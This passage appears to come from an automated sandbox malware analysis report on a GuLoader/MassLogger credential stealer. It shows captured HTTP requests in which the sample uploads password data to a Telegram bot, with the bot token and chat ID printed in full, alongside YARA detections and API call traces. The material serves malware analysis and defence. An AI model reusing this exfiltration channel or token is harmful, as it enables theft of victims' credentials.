2025-01-10 21:32:50 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43614,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544770,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.3	50064	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:51 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd36fd39d5822d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 36 66 64 33 39 64 35 38 32 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd36fd39d5822dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:51 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:52 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43615,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544771,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.3	50066	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:53 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd37464fcfa082 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:53 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 34 36 34 66 63 66 61 30 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd37464fcfa082Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:53 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:53 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43616,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544773,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.3	50068	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:54 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd37840a32eeab Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:32:54 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 38 34 30 61 33 32 65 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd37840a32eeabContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:55 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:55 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43617,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544775,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.3	50070	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:32:56 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd37db51e674d1 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:32:56 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 37 64 62 35 31 65 36 37 34 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd37db51e674d1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:32:57 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:32:56 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:32:57 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43618,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544776,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.3	50072	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:33:01 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31947219ce40 Host: api.telegram.org Content-Length: 1090
2025-01-10 21:33:01 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 34 37 32 31 39 63 65 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31947219ce40Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:33:01 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:33:01 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:33:01 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43619,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544781,"document":{"file_n

Target ID:	0
Start time:	16:30:49
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\6ZoBPR3isG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6ZoBPR3isG.exe"
Imagebase:	0x400000
File size:	1'039'043 bytes
MD5 hash:	DCAE922F4D3C1946B3C41158BE23DC2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1650191934.0000000003386000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:31:19
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\6ZoBPR3isG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6ZoBPR3isG.exe"
Imagebase:	0x400000
File size:	1'039'043 bytes
MD5 hash:	DCAE922F4D3C1946B3C41158BE23DC2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2616593291.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20%
Total number of Nodes:	1599
Total number of Limit Nodes:	38

Executed Functions

Function 004034A5 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\6ZoBPR3isG.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

~nsu, xrefs: 00403845
C:\Users\user\Desktop\6ZoBPR3isG.exe, xrefs: 004038F8
.tmp, xrefs: 00403861
TMP, xrefs: 00403735
Low, xrefs: 0040371B
\Temp, xrefs: 004036FF
UXTHEME, xrefs: 004034F5, 004034FA, 00403500
NSIS Error, xrefs: 00403567
C:\Users\user\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
1033, xrefs: 00403749
SeShutdownPrivilege, xrefs: 0040396F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
Error launching installer, xrefs: 004037D0
TEMP, xrefs: 0040372D

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\6ZoBPR3isG.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-650574359
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
